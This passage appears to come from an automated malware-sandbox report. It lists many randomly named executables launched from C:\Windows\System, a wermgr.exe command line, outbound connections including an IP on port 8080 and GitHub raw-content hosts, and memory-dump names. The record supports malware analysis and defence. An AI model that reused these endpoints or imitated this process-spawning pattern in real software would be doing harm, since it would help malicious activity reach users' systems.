C:\Windows\System\XgXraMe.exe

C:\Windows\System\MLVRoWX.exe

C:\Windows\System\MLVRoWX.exe

C:\Windows\System\XGjqnXi.exe

C:\Windows\System\XGjqnXi.exe

C:\Windows\System\TvxygjN.exe

C:\Windows\System\TvxygjN.exe

C:\Windows\System\cjPSSPY.exe

C:\Windows\System\cjPSSPY.exe

C:\Windows\System\StjTdIn.exe

C:\Windows\System\StjTdIn.exe

C:\Windows\System\SFYrEBW.exe

C:\Windows\System\SFYrEBW.exe

C:\Windows\System\guDNBdv.exe

C:\Windows\System\guDNBdv.exe

C:\Windows\System\lekZTru.exe

C:\Windows\System\lekZTru.exe

C:\Windows\System\lUiAEWm.exe

C:\Windows\System\lUiAEWm.exe

C:\Windows\System\UEiebvL.exe

C:\Windows\System\UEiebvL.exe

C:\Windows\System\UxfMIur.exe

C:\Windows\System\UxfMIur.exe

C:\Windows\System\DbCgngQ.exe

C:\Windows\System\DbCgngQ.exe

C:\Windows\System\XKXXMEU.exe

C:\Windows\System\XKXXMEU.exe

C:\Windows\System\CzBpNOl.exe

C:\Windows\System\CzBpNOl.exe

C:\Windows\System\NzLlSfT.exe

C:\Windows\System\NzLlSfT.exe

C:\Windows\System\oDKrbYM.exe

C:\Windows\System\oDKrbYM.exe

C:\Windows\System\ZvxumvH.exe

C:\Windows\System\ZvxumvH.exe

C:\Windows\System\GlhumNb.exe

C:\Windows\System\GlhumNb.exe

C:\Windows\System\Ikalqnf.exe

C:\Windows\System\Ikalqnf.exe

C:\Windows\System\qBdZAas.exe

C:\Windows\System\qBdZAas.exe

C:\Windows\System\RtWZjOI.exe

C:\Windows\System\RtWZjOI.exe

C:\Windows\System\cYOIcOz.exe

C:\Windows\System\cYOIcOz.exe

C:\Windows\System\bOeNysv.exe

C:\Windows\System\bOeNysv.exe

C:\Windows\System\rPAYwJL.exe

C:\Windows\System\rPAYwJL.exe

C:\Windows\System\zdRxWIC.exe

C:\Windows\System\zdRxWIC.exe

C:\Windows\System\zNwNthH.exe

C:\Windows\System\zNwNthH.exe

C:\Windows\System\wzYdUXb.exe

C:\Windows\System\wzYdUXb.exe

C:\Windows\System\UMuvnhA.exe

C:\Windows\System\UMuvnhA.exe

C:\Windows\System\Zxubuia.exe

C:\Windows\System\Zxubuia.exe

C:\Windows\System\dtqCQfi.exe

C:\Windows\System\dtqCQfi.exe

C:\Windows\System\Wrqfpix.exe

C:\Windows\System\Wrqfpix.exe

C:\Windows\System\uZzzMvk.exe

C:\Windows\System\uZzzMvk.exe

C:\Windows\System\rSkeEWn.exe

C:\Windows\System\rSkeEWn.exe

C:\Windows\System\VCzdIUb.exe

C:\Windows\System\VCzdIUb.exe

C:\Windows\System\ZFHMBdJ.exe

C:\Windows\System\ZFHMBdJ.exe

C:\Windows\System\QvzEWaT.exe

C:\Windows\System\QvzEWaT.exe

C:\Windows\System\iejTSEg.exe

C:\Windows\System\iejTSEg.exe

C:\Windows\System\RvZmXfu.exe

C:\Windows\System\RvZmXfu.exe

C:\Windows\System\uDnhCFB.exe

C:\Windows\System\uDnhCFB.exe

C:\Windows\System\JCOJFVY.exe

C:\Windows\System\JCOJFVY.exe

C:\Windows\system32\wermgr.exe

"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4972" "2980" "2932" "2984" "0" "0" "2988" "0" "0" "0" "0" "0"

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files


memory/3756-2887-0x00007FF7E3A30000-0x00007FF7E3E22000-memory.dmp

memory/1960-2883-0x00007FF72DAC0000-0x00007FF72DEB2000-memory.dmp

memory/4308-2899-0x00007FF6F1DF0000-0x00007FF6F21E2000-memory.dmp

memory/4072-2881-0x00007FF7C3730000-0x00007FF7C3B22000-memory.dmp

memory/3728-2879-0x00007FF75EEB0000-0x00007FF75F2A2000-memory.dmp

memory/5056-2893-0x00007FF6E8650000-0x00007FF6E8A42000-memory.dmp

memory/4828-2889-0x00007FF76D960000-0x00007FF76DD52000-memory.dmp

memory/1060-2885-0x00007FF6E0640000-0x00007FF6E0A32000-memory.dmp